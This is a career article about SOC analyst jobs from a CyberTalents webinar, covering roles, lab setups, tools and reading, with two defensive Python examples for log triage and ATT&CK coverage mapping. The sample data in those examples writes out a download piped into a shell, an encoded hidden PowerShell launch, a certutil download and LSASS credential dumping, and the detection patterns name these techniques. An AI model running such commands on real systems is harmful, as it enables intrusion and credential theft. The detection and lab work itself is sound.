What is required to Work in SOC Analysis Jobs? 

CyberTalents has launched a series of webinars about cyber security jobs named “What is required to work in cyber security jobs?”. Throughout the series we will talk about different cyber security jobs and what is required to work in each of them: spotting each job, explaining it in detail, describing its daily operations, the resources and training needed, and much more. There are around 15 to 20 jobs in the cybersecurity field. Before starting your career, you need to identify which one of these jobs you would like to master, and accordingly draw your career path, build your plan, and reach your ultimate goals.


Starting our series, we were honored to have Eng. Hassan Mouard, who has been in the cybersecurity field for over 20 years. He brings diverse insights into the cybersecurity challenges of several industries, including banking, telco, ISP, and consulting. He is currently leading the security services unit of a Fortune 500 company in Egypt, with a strong focus on security intelligence and operations consulting. He helps clients worldwide design, build, and evolve their cybersecurity programs and capabilities. He is also an active member of the region's cybersecurity community, a board member of the OWASP Cairo chapter, and a regular speaker at local and regional events. Hassan holds a master’s degree in information security engineering from the SANS Technology Institute and is among the very few holders of GIAC's GSE certification.


In this webinar, he gave a full picture of the SOC job market and how to start a career in this field.


What is the need for SOC?

In the last few years, the focus has shifted from prevention alone to prevention plus detection: discovering the attackers who are already inside the network, so that the next attack, or any breach of corporate data, can be prevented.


According to the SANS SOC Survey, there is a shortage of resources and staff in the cybersecurity field, which reflects the need for SOC analysts.



The Job

There are many jobs and roles inside the SOC, as below:

- Cybersecurity Monitoring “Tier-1” - focusing on the initial triage of alerts.

- Cybersecurity Analysis “Tier-2” - understanding the incident and the root cause of the attack.

- Incident Response “Tier-3” - handling the analysis of more sophisticated attacks.

- Intelligence Analysis

- Content Engineers

- Platform Engineers

- Malware Analyst

- Forensics Analyst

- Threat Hunting


Building Your Own Lab

As Eng. Hassan mentioned, you may need to build your own lab to experiment with different scenarios and gain more practical knowledge. Below are different types of setup, depending on your budget and the size of the lab:


Your Own Machine

- Observe logs for specific actions

- Use adversary simulation tools

- Good for understanding non-malicious techniques

- Limited understanding of more complex activity (e.g. lateral movement)


Virtual Machines

- Use adversary simulation tools + real-world attack tools

- Good for understanding both malicious and non-malicious techniques

- Make sure you create snapshots before running anything malicious, so you can roll the machines back

- Can support more complex scenarios with multiple virtual machines

- Limited by your computer's resources


Cloud

- Flexible, dynamic and practically unlimited resources

- But, beware of the cost

- Free tiers might not always be enough

- Consider automating provisioning and configuration (Infrastructure as Code), e.g.

         Vagrant/Terraform + Ansible


Tools of SOC

  • Security Analytics

    - SIEM

    - Data Analytics

    - Elastic Stack (ELK)

    - SIEM community versions (QRadar, Splunk)


  • Security Orchestration, Automation, and Response (SOAR)

    - TheHive

    - SOAR community versions (Phantom)


  • Log Sources

    - OS logs

    - Sysmon (Windows)

    - auditd (Linux)
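The two endpoint log sources above, Sysmon on Windows and auditd on Linux, record the same kind of fact (a process was created) in very different shapes, and the first job of SOC content is to normalize them before a detection can be written once. The Python below is an added example for this article, not code from the webinar, CyberTalents or either tool: it parses a constructed Sysmon Event ID 1 record and a constructed auditd SYSCALL/EXECVE pair into one schema, then runs simple triage detections over both. The ATT&CK technique IDs attached to the detections and the "uid 33 is the web server account" check are the author's assumptions, not an official mapping.

```python
"""Normalize Sysmon and auditd process-creation records and run triage detections.

Added example for this article (not CyberTalents, Sysmon or auditd code). The
SYSMON_EVENT and AUDITD_LINES below are constructed samples shaped like real
output; the technique IDs in detect() are an assumed mapping.
"""
import re
import xml.etree.ElementTree as ET

# Windows event log XML namespace that Sysmon events are written under.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed Sysmon Event ID 1 (process create): Word spawning encoded PowerShell.
SYSMON_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -nop -w hidden -enc SQBFAFgA</Data>
    <Data Name="User">CORP\\alice</Data>
    <Data Name="ParentImage">C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE</Data>
  </EventData>
</Event>"""

# Constructed auditd SYSCALL + EXECVE records for one execve (same audit msg id).
# auditd hex-encodes any argument containing spaces or special characters,
# so a2 below is "curl http://203.0.113.5/x | sh" as unquoted hex.
AUDITD_LINES = [
    'type=SYSCALL msg=audit(1700000000.123:4242): arch=c000003e syscall=59 success=yes '
    'exit=0 ppid=1337 pid=1338 auid=4294967295 uid=33 gid=33 comm="sh" exe="/usr/bin/dash" key="exec"',
    'type=EXECVE msg=audit(1700000000.123:4242): argc=3 a0="sh" a1="-c" '
    'a2=6375726c20687474703a2f2f3230332e302e3131332e352f78207c207368',
]


def parse_sysmon_process_create(xml_text):
    """Return a normalized dict for a Sysmon Event ID 1 event, or None for other IDs."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "1":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {"source": "sysmon", "user": data.get("User", ""), "image": data.get("Image", ""),
            "parent": data.get("ParentImage", ""), "cmdline": data.get("CommandLine", "")}


AUDIT_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
AUDIT_MSG_ID = re.compile(r"audit\([\d.]+:(\d+)\)")


def _audit_value(raw):
    """Unquote a quoted auditd value; decode an unquoted one as hex (auditd's escape
    for args with spaces); leave anything else, e.g. (null), untouched."""
    if raw.startswith('"'):
        return raw[1:-1]
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return raw


def parse_auditd_execve(lines):
    """Join SYSCALL and EXECVE records sharing an audit msg id into normalized events."""
    by_id = {}
    for line in lines:
        m = AUDIT_MSG_ID.search(line)
        if m:
            fields = dict(AUDIT_FIELD.findall(line))
            by_id.setdefault(m.group(1), {})[fields["type"]] = fields
    events = []
    for rec in by_id.values():
        sc, ex = rec.get("SYSCALL"), rec.get("EXECVE")
        if not sc or not ex:
            continue  # only execve calls carry an EXECVE record with the argv
        argv = [_audit_value(ex[f"a{i}"]) for i in range(int(ex["argc"]))]
        events.append({"source": "auditd", "user": sc.get("uid", ""),
                       "image": _audit_value(sc.get("exe", '""')),
                       "parent": sc.get("ppid", ""), "cmdline": " ".join(argv)})
    return events


def detect(ev):
    """Return (ATT&CK technique, reason) for each detection that fires on an event."""
    hits = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"].lower()
    if ev["source"] == "sysmon":
        if parent.endswith(("winword.exe", "excel.exe", "powerpnt.exe")) and \
                image.endswith(("powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe")):
            hits.append(("T1204.002", "Office application spawned a shell/script host"))
        if image.endswith("powershell.exe") and re.search(r"\s-(e|en|enc|encodedcommand)\s", cmd):
            hits.append(("T1059.001", "PowerShell started with an encoded command"))
    elif ev["source"] == "auditd":
        if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
            hits.append(("T1105", "download piped straight into a shell"))
        # Assumption: uid 33 is www-data (Debian family); a web server spawning a shell
        # is a common web shell follow-on.
        if ev["user"] == "33" and image.endswith(("/dash", "/bash", "/sh")):
            hits.append(("T1505.003", "web server account spawned a shell"))
    return hits


def triage(sysmon_events, auditd_lines):
    """Normalize both sources and return the alerts a Tier-1 analyst would see."""
    events = [e for e in map(parse_sysmon_process_create, sysmon_events) if e]
    events += parse_auditd_execve(auditd_lines)
    return [{"source": ev["source"], "technique": tid, "reason": why,
             "user": ev["user"], "cmdline": ev["cmdline"]}
            for ev in events for tid, why in detect(ev)]


if __name__ == "__main__":
    for a in triage([SYSMON_EVENT], AUDITD_LINES):
        print(f'[{a["source"]}] {a["technique"]} {a["reason"]}: {a["cmdline"]}')
```

The auditd hex decoding is the detail that bites in practice: a rule like `curl.*\| sh` never fires on raw audit lines because the argument carrying the pipe is not plain text until it is decoded. The same is true in reverse for Sysmon, where the command line is plain text but the namespace in the event XML has to be declared before any XPath finds the fields.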


What kind of resources are needed?

MITRE Resources

- attack.mitre.org (ATT&CK, the knowledge base of adversary tactics and techniques)

- shield.mitre.org (MITRE Shield, active defense techniques; since superseded by MITRE Engage at engage.mitre.org)

- https://mitre-attack.github.io/attack-navigator/enterprise/ (ATT&CK Navigator, for visualizing coverage as layers)



Practice Platforms

- https://cybertalents.com

- https://cyberdefenders.org




Atomic Red Team

- https://github.com/redcanaryco/atomic-red-team


Red Team Automation

- https://github.com/endgameinc/RTA 
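The MITRE resources and the adversary simulation projects above fit together in a lab: run Atomic Red Team (or RTA) tests against your machines, note which ones your SIEM content caught, and plot the result in ATT&CK Navigator. The Python below is an added example for this article, not code from Atomic Red Team, RTA, MITRE or CyberTalents: it takes constructed test descriptions that mirror the fields of an Atomic Red Team test file (attack_technique, display_name, atomic_tests with name, supported_platforms and executor), an assumed set of which tests raised alerts, and writes a Navigator layer whose score is the percentage of tests detected per technique. The ATT&CK, Navigator and layer version strings are placeholders to match the Navigator build you use.

```python
"""Turn an adversary-simulation run into an ATT&CK Navigator layer.

Added example for this article (not Atomic Red Team, RTA, MITRE or CyberTalents
code). ATOMIC_TESTS and DETECTED are constructed; version strings are assumed.
"""
import json

# Constructed tests shaped like Atomic Red Team YAML, not the real test files.
ATOMIC_TESTS = [
    {"attack_technique": "T1059.001",
     "display_name": "Command and Scripting Interpreter: PowerShell",
     "atomic_tests": [
         {"name": "Encoded PowerShell command", "supported_platforms": ["windows"],
          "executor": {"name": "command_prompt",
                       "command": "powershell -nop -w hidden -enc <base64>"}}]},
    {"attack_technique": "T1105",
     "display_name": "Ingress Tool Transfer",
     "atomic_tests": [
         {"name": "curl pipe to sh", "supported_platforms": ["linux"],
          "executor": {"name": "sh", "command": "curl -s http://#{url} | sh"}},
         {"name": "certutil download", "supported_platforms": ["windows"],
          "executor": {"name": "command_prompt",
                       "command": "certutil -urlcache -split -f #{url} out.bin"}}]},
    {"attack_technique": "T1003.001",
     "display_name": "OS Credential Dumping: LSASS Memory",
     "atomic_tests": [
         {"name": "procdump lsass", "supported_platforms": ["windows"],
          "executor": {"name": "command_prompt",
                       "command": "procdump -ma lsass.exe lsass.dmp"}}]},
    {"attack_technique": "T1053.005",
     "display_name": "Scheduled Task/Job: Scheduled Task",
     "atomic_tests": [
         {"name": "schtasks create", "supported_platforms": ["windows"],
          "executor": {"name": "command_prompt",
                       "command": "schtasks /create /sc once /tn T1053 /tr calc.exe /st 23:59"}}]},
]

# (technique, test name) pairs that produced an alert during the run (constructed).
DETECTED = {("T1059.001", "Encoded PowerShell command"), ("T1105", "curl pipe to sh")}


def coverage(tests, detected):
    """Per technique: tests executed, tests detected, and the platforms exercised."""
    cov = {}
    for t in tests:
        tid = t["attack_technique"]
        ran = [a["name"] for a in t["atomic_tests"]]
        caught = [n for n in ran if (tid, n) in detected]
        platforms = sorted({p for a in t["atomic_tests"] for p in a["supported_platforms"]})
        cov[tid] = {"name": t["display_name"], "executed": len(ran),
                    "detected": len(caught), "platforms": platforms}
    return cov


def gaps(cov):
    """Techniques that were exercised but never detected: the content-engineering backlog."""
    return sorted(tid for tid, c in cov.items() if c["executed"] and not c["detected"])


def navigator_layer(cov, name="SOC lab coverage"):
    """Build a Navigator layer dict; score is the % of tests detected per technique."""
    techniques = []
    for tid, c in sorted(cov.items()):
        score = round(100 * c["detected"] / c["executed"]) if c["executed"] else 0
        techniques.append({
            "techniqueID": tid,
            "score": score,
            "enabled": True,
            "comment": f'{c["detected"]}/{c["executed"]} atomic tests detected '
                       f'({", ".join(c["platforms"])})',
        })
    return {
        "name": name,
        # Assumed versions: set these to the ATT&CK/Navigator versions you run.
        "versions": {"attack": "13", "navigator": "4.9", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Generated from adversary simulation results; score = % of tests detected",
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100},
        "techniques": techniques,
    }


def to_json(layer):
    """Serialize the layer the way Navigator's 'Open Existing Layer' expects (a JSON file)."""
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    cov = coverage(ATOMIC_TESTS, DETECTED)
    print("undetected techniques:", gaps(cov))
    print(to_json(navigator_layer(cov)))
```

Save the printed JSON to a file and load it in Navigator via Open Existing Layer; the red cells are the techniques where a simulation ran and nothing fired, which is exactly the list a content engineer should be working from next.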


Reading List

Incident Response

- NIST SP 800-61 Rev. 2, Computer Security Incident Handling Guide

    ○ https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final

- Blue Team Handbook: Incident Response Edition

- Intelligence-Driven Incident Response: Outwitting the Adversary


Security Operations Center

- Security Operations Center: Building, Operating, and Maintaining your SOC (Cisco Press)

- Blue Team Handbook: SOC, SIEM & Threat Hunting Use Cases


Network Security Monitoring & Analysis

- The Practice of Network Security Monitoring: Understanding Incident Detection and Response (Richard Bejtlich)

- The TAO of Network Security Monitoring: Beyond Intrusion Detection (Richard Bejtlich)

- Practical Packet Analysis: Using Wireshark to Solve Real World Problems


Computer Forensics

- Incident Response and Computer Forensics, Third Edition

- The Art of Memory Forensics

- Digital Forensics with Open Source Tools


Malware Analysis

- Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software

- Malware Analyst's Cookbook


Finally, the SOC is a core part of the cybersecurity industry, and the growing number of security issues and attacks has increased the demand for SOC analysts across many areas.